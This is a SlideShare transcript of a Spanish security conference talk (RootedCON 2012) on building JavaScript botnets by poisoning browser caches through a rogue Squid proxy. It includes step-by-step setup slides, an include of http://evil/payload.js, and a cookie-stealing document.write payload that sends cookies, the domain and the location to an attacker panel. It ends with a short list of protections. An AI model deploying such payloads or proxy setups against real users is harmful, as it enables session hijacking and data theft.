Owning "bad" guys {and mafia}   with Javascript botnets    Chema Alonso & Manu “The Sur”
¡Qué seinfecten  ellos!
Man in the Middle• Interceptación de comunicaciones entre  clientes y servidores• Canal comprometido … p0wned seguro• Red:...
Man in the Browser• Plugins para interceptar navegación  – BHO  – Addons• Acceso a todo el navegador  – Passwords  – Códig...
JavaScript in the Middle• Envenenamiento de la caché del navegador• No es permanente:   – Si se borra la caché, se elimina...
Google Analytics js y malware
¿Cómo meterlo?•   XSS Permanentes•   Owneando HTTP Servers•   Ataques Man In the middle de red•   Ataques a memcache•   Im...
-   Framework para infectar la caché de navegadores-   Inyecta un javascript en cliente-   Ese javascript va incluyendo lo...
¿Cómo hacer una Botnet usando         Javascript?
¿TOR?
Fácil, Fácil….
Cómprate un Server barato, barato
Monta un Proxy con SQUID GET / HTTP/1.1                 GET / HTTP/1.1 Host: www.web.com              Host: www.web.com   ...
Configura squid y haz que no expiren  Squid.conf: Activar URL rewrite program  .htaccess: Que no expiren los objetos de Ap...
Infecta todos los .js
Inyecta tu javascript en el cliente
Distribuye tu Proxy
Deja que Internet haga el resto
Prepara Payloads: 1 robar cookiesdocument.write(“    <img id=domaingrabber    src=http://X.X.X.X/panel/    domaingrabber.p...
Prepara Payloads 2: robar forms
Disfruta
¿Quién usa esto?
Mafias: El Nigeriano
Mafias: El Nigeriano
Mafias: El Nigeriano
Mafias: El Nigeriano
Mafias: El Nigeriano
Mafias: Depredadores
Mafias: Depredadores
Mafias: Depredadores
Mafias: Depredadores
Mafias: Depredadores
Mafias: Depredadores
Mafias: Depredadores
Estafador: El pobre perro
Estafador: El pobre perro
Psicopatas
Preocupados por el anonimato
Preocupados por el anonimato
El del business de leer
El hacker…
… que estaba hackeando…
… que estaba hackeado
Intranet
Y por supuesto Pr0n
Pr0n
Prepara Payloads: infecta webs
Ataque dirigido a sitios• Selección objetivo  – Banco  – Red Social  – Intranet• Analiza los js que carga• Payload:  – Inc...
Demo
Protecciones• Cuidado con los mitm  – Proxy  – Redes TOR• Política de  descontaminación• Navega sin caché• VPNs no son pro...
¿Preguntas?  chema@informatica64.commfernandez@informatica64.com
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]
Upcoming SlideShare
Loading in …5
×

Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]

2,041 views

Published on

En esta sesión se verá el funcionamiento de las javascript botnets, se analizarán entornos de despliegue y explotación, y acciones que pueden llevarse a cabo. Además, la sesión mostrará resultados de un estudio realizado a través de servidores proxy, nodos TOR y Rogue APs, que han permitido desplegar un sistema de prueba.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,041
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
49
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]

  1. 1. Owning "bad" guys {and mafia} with Javascript botnets Chema Alonso & Manu “The Sur”
  2. 2. ¡Qué seinfecten ellos!
  3. 3. Man in the Middle• Interceptación de comunicaciones entre clientes y servidores• Canal comprometido … p0wned seguro• Red: – ARP Spoofing – Rogue DHCP(6) – ICMPv6 Sppofing, SLAAC• DNS Spoofing
  4. 4. Man in the Browser• Plugins para interceptar navegación – BHO – Addons• Acceso a todo el navegador – Passwords – Código• Troyanos Bancarios – “Tengo un ruso en mi IE”
  5. 5. JavaScript in the Middle• Envenenamiento de la caché del navegador• No es permanente: – Si se borra la caché, se elimina la infección• Todo archivo cacheado se usa si no ha expirado• Permiten introducir código javascript remoto• Acceso a: – Cookies • Salvo HTTPOnly (more or less) – Código HTML – Campos introducidos en formularios – URL – Ejecución de código remoto – …
  6. 6. Google Analytics js y malware
  7. 7. ¿Cómo meterlo?• XSS Permanentes• Owneando HTTP Servers• Ataques Man In the middle de red• Ataques a memcache• Imaginación….
  8. 8. - Framework para infectar la caché de navegadores- Inyecta un javascript en cliente- Ese javascript va incluyendo los mismos payloads- http://beefproject.com- Muy conocido
  9. 9. ¿Cómo hacer una Botnet usando Javascript?
  10. 10. ¿TOR?
  11. 11. Fácil, Fácil….
  12. 12. Cómprate un Server barato, barato
  13. 13. Monta un Proxy con SQUID GET / HTTP/1.1 GET / HTTP/1.1 Host: www.web.com Host: www.web.com Response Response Home.html Home.html GET /a.jsp HTTP/1.1 GET /a.jsp HTTP/1.1 Host: www.web.com Host: www.web.com Response Response a.Jsp + pasarela.js a.jsp include http://evil/payload.js GET /payload.js HTTP/1.1 Host: evil
  14. 14. Configura squid y haz que no expiren Squid.conf: Activar URL rewrite program .htaccess: Que no expiren los objetos de Apache
  15. 15. Infecta todos los .js
  16. 16. Inyecta tu javascript en el cliente
  17. 17. Distribuye tu Proxy
  18. 18. Deja que Internet haga el resto
  19. 19. Prepara Payloads: 1 robar cookiesdocument.write(“ <img id=domaingrabber src=http://X.X.X.X/panel/ domaingrabber.php?id=0.0.0.0& domain="+document.domain+"& location="+document.location+"& cookie="+document.cookie+" style=display:none;/>");
  20. 20. Prepara Payloads 2: robar forms
  21. 21. Disfruta
  22. 22. ¿Quién usa esto?
  23. 23. Mafias: El Nigeriano
  24. 24. Mafias: El Nigeriano
  25. 25. Mafias: El Nigeriano
  26. 26. Mafias: El Nigeriano
  27. 27. Mafias: El Nigeriano
  28. 28. Mafias: Depredadores
  29. 29. Mafias: Depredadores
  30. 30. Mafias: Depredadores
  31. 31. Mafias: Depredadores
  32. 32. Mafias: Depredadores
  33. 33. Mafias: Depredadores
  34. 34. Mafias: Depredadores
  35. 35. Estafador: El pobre perro
  36. 36. Estafador: El pobre perro
  37. 37. Psicopatas
  38. 38. Preocupados por el anonimato
  39. 39. Preocupados por el anonimato
  40. 40. El del business de leer
  41. 41. El hacker…
  42. 42. … que estaba hackeando…
  43. 43. … que estaba hackeado
  44. 44. Intranet
  45. 45. Y por supuesto Pr0n
  46. 46. Pr0n
  47. 47. Prepara Payloads: infecta webs
  48. 48. Ataque dirigido a sitios• Selección objetivo – Banco – Red Social – Intranet• Analiza los js que carga• Payload: – Inclusión de payloads en cualquier página que navegue.
  49. 49. Demo
  50. 50. Protecciones• Cuidado con los mitm – Proxy – Redes TOR• Política de descontaminación• Navega sin caché• VPNs no son protección
  51. 51. ¿Preguntas? chema@informatica64.commfernandez@informatica64.com

×